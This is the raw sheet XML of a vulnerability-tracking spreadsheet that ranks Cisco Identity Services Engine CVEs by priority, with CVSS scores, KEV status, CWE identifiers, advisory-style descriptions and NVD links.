    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S665" r:id="rId664"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S666" r:id="rId665"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S667" r:id="rId666"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S668" r:id="rId667"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S669" r:id="rId668"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S670" r:id="rId669"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S671" r:id="rId670"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S672" r:id="rId671"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S673" r:id="rId672"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S674" r:id="rId673"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S675" r:id="rId674"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S676" r:id="rId675"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S677" r:id="rId676"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S678" r:id="rId677"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S679" r:id="rId678"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S680" r:id="rId679"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S681" r:id="rId680"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S682" r:id="rId681"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S683" r:id="rId682"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S684" r:id="rId683"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S685" r:id="rId684"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S686" r:id="rId685"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S687" r:id="rId686"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S688" r:id="rId687"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S689" r:id="rId688"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S690" r:id="rId689"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S691" r:id="rId690"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S692" r:id="rId691"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S693" r:id="rId692"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S694" r:id="rId693"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S695" r:id="rId694"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S696" r:id="rId695"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S697" r:id="rId696"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S698" r:id="rId697"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S699" r:id="rId698"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S700" r:id="rId699"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S701" r:id="rId700"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S702" r:id="rId701"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S703" r:id="rId702"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S704" r:id="rId703"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S705" r:id="rId704"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S706" r:id="rId705"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S707" r:id="rId706"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S708" r:id="rId707"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S709" r:id="rId708"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S710" r:id="rId709"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S711" r:id="rId710"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S712" r:id="rId711"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S713" r:id="rId712"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S714" r:id="rId713"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S715" r:id="rId714"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S716" r:id="rId715"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S717" r:id="rId716"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S718" r:id="rId717"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S719" r:id="rId718"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S720" r:id="rId719"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S721" r:id="rId720"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S722" r:id="rId721"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S723" r:id="rId722"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S724" r:id="rId723"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S725" r:id="rId724"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S726" r:id="rId725"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S727" r:id="rId726"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S728" r:id="rId727"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S729" r:id="rId728"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S730" r:id="rId729"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S731" r:id="rId730"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S732" r:id="rId731"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S733" r:id="rId732"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S734" r:id="rId733"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S735" r:id="rId734"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S736" r:id="rId735"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S737" r:id="rId736"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S738" r:id="rId737"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S739" r:id="rId738"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S740" r:id="rId739"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S741" r:id="rId740"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S742" r:id="rId741"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S743" r:id="rId742"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S744" r:id="rId743"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S745" r:id="rId744"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S746" r:id="rId745"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S747" r:id="rId746"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S748" r:id="rId747"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S749" r:id="rId748"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S750" r:id="rId749"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S751" r:id="rId750"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S752" r:id="rId751"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S753" r:id="rId752"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S754" r:id="rId753"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S755" r:id="rId754"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S756" r:id="rId755"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S757" r:id="rId756"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S758" r:id="rId757"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S759" r:id="rId758"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S760" r:id="rId759"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S761" r:id="rId760"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S762" r:id="rId761"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S763" r:id="rId762"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S764" r:id="rId763"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S765" r:id="rId764"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S766" r:id="rId765"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S767" r:id="rId766"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S768" r:id="rId767"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S769" r:id="rId768"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S770" r:id="rId769"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S771" r:id="rId770"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S772" r:id="rId771"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S773" r:id="rId772"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S774" r:id="rId773"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S775" r:id="rId774"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S776" r:id="rId775"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S777" r:id="rId776"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S778" r:id="rId777"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S779" r:id="rId778"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S780" r:id="rId779"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S781" r:id="rId780"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S782" r:id="rId781"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S783" r:id="rId782"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S784" r:id="rId783"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S785" r:id="rId784"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S786" r:id="rId785"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S787" r:id="rId786"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S788" r:id="rId787"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S789" r:id="rId788"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S790" r:id="rId789"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S791" r:id="rId790"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S792" r:id="rId791"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S793" r:id="rId792"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S794" r:id="rId793"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S795" r:id="rId794"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S796" r:id="rId795"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S797" r:id="rId796"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S798" r:id="rId797"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S799" r:id="rId798"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S800" r:id="rId799"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S801" r:id="rId800"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S802" r:id="rId801"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S803" r:id="rId802"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S804" r:id="rId803"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S805" r:id="rId804"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S806" r:id="rId805"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S807" r:id="rId806"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S808" r:id="rId807"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S809" r:id="rId808"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S810" r:id="rId809"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S811" r:id="rId810"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S812" r:id="rId811"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S813" r:id="rId812"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S814" r:id="rId813"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S815" r:id="rId814"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S816" r:id="rId815"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S817" r:id="rId816"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S818" r:id="rId817"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S819" r:id="rId818"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S820" r:id="rId819"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S821" r:id="rId820"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S822" r:id="rId821"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S823" r:id="rId822"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S824" r:id="rId823"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S825" r:id="rId824"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S826" r:id="rId825"/>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30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18" customWidth="1" min="3" max="3"/>
    <col width="7" customWidth="1" min="4" max="4"/>
    <col width="10" customWidth="1" min="5" max="5"/>
    <col width="10" customWidth="1" min="6" max="6"/>
    <col width="6" customWidth="1" min="7" max="7"/>
    <col width="7" customWidth="1" min="8" max="8"/>
    <col width="9" customWidth="1" min="9" max="9"/>
    <col width="16" customWidth="1" min="10" max="10"/>
    <col width="28" customWidth="1" min="11" max="11"/>
    <col width="28" customWidth="1" min="12" max="12"/>
    <col width="14" customWidth="1" min="13" max="13"/>
    <col width="18" customWidth="1" min="14" max="14"/>
    <col width="12" customWidth="1" min="15" max="15"/>
    <col width="11" customWidth="1" min="16" max="16"/>
    <col width="12" customWidth="1" min="17" max="17"/>
    <col width="90" customWidth="1" min="18" max="18"/>
    <col width="42" customWidth="1" min="19" max="19"/>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KEV Due</t>
        </is>
      </c>
      <c r="Q1" s="4" t="inlineStr">
        <is>
          <t>CWE</t>
        </is>
      </c>
      <c r="R1" s="4" t="inlineStr">
        <is>
          <t>Description</t>
        </is>
      </c>
      <c r="S1" s="4" t="inlineStr">
        <is>
          <t>Link</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B2" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-648</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in an API of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to bypass authentication.
This vulnerability is due to insufficient authentication control on an API endpoint. An attacker could exploit this vulnerability by sending a crafted request to an affected API endpoint. A successful exploit could allow the attacker to gain unauthorized access to the affected device by bypassing the web-based management interface.</t>
        </is>
      </c>
      <c r="S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20130</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr"/>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC), engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20130 are related to improper neutralization of special elements issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-74.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20130</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20192</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr"/>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20192 are related to improper access control issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-284.</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20192</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76423</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr"/>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the REST API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to gain administrative access to an affected device.
This vulnerability is due to the REST API web service being exposed with insufficient authorization checks. An attacker could exploit this vulnerability by sending a crafted HTTP request to the exposed REST API port. A successful exploit could allow the attacker to read and modify ISE configuration and identity data with administrative privileges.</t>
        </is>
      </c>
      <c r="S5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76423</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20234</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20234 are related to insufficiently protected credentials issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-522.</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20234</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
